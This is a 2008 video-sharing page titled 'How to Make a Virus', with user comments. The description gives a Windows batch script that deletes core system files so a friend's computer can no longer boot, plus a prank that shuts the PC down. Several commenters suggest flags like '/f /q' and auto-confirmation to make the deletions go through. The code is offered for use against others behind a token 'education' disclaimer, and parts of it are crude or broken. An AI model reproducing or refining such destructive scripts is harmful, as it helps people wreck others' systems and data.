Metacafe Header Takeover

How to Make a Virus

Tags:
Dangerous Delete Fake Files Important Computers Real Virus Windows
MarioBanane23
  • Affiliate Submitter:
    MarioBanane23
  • International International
  • Comments: 3
  • Views: 414
  • Added: 04-Jul-08

Heres to simple way to make a fake and
a real virus!!!
****************************************



The fake virus consists to close your
friends computer. A message saying
Trojan Horse activated will appear and
their computer will close after 90 seconds( you can put how much time you want)!!!

The real virus deletes important files , they wont even be able to open their computer again.

Here are the codes to write in NotePad


@echo off
del "C:\windows\pchealth\"
del "C:\windows\system\"
del "C:\windows\system32\restore\"
del "winlog.exe"
del "C:\windows\system32}\autoexec.nt"
del "C:\windows\system32\logonui.exe"
del "C:\windows\system32\ntoskrnl.exe"

or just

@echo off
del "C:\windows\system32\logonui.exe"


ENJOY!!! and i am not responsible for any trouble!! this is only for your education

  1. Categories: Other
Comments on

How to Make a Virus

4 Comments | Add Comment
  • NOT A VIRUS!

    You also don't need to put the quotes. Plus, it will ask if you are sure you want to delete those files and all they have to do is press "n". So, if you put (for example) "del c:command.com y" it will automatically press "y" for you, when it asks you to confirm that you want to delete the file.

    By zero_xavier 1237602854 Reply Spam Moderate Up Moderate Down
  • NOT A VIRUS!

    That isn't a virus that is a batch file! All it does is automatically gives commands to command prompt. Anyway, your should put "@echo off" at the beginning. Besides all you have to do is press "Cntrl + C" or "Cntrl + Break" to stop it.

    By zero_xavier 1237602658 Reply Spam Moderate Up Moderate Down
  • what my other video ...

    what my other video of MarioBanane4life

    By MarioBanane23 [Affiliate User] 1216236046 Reply Spam Moderate Up Moderate Down
  • Nice batch virus, ...

    Nice batch virus, dont you have to put del /f /q

    By jakash3 [Affiliate User] 1216212982 Reply Spam Moderate Up Moderate Down
4 Comments | Add Comment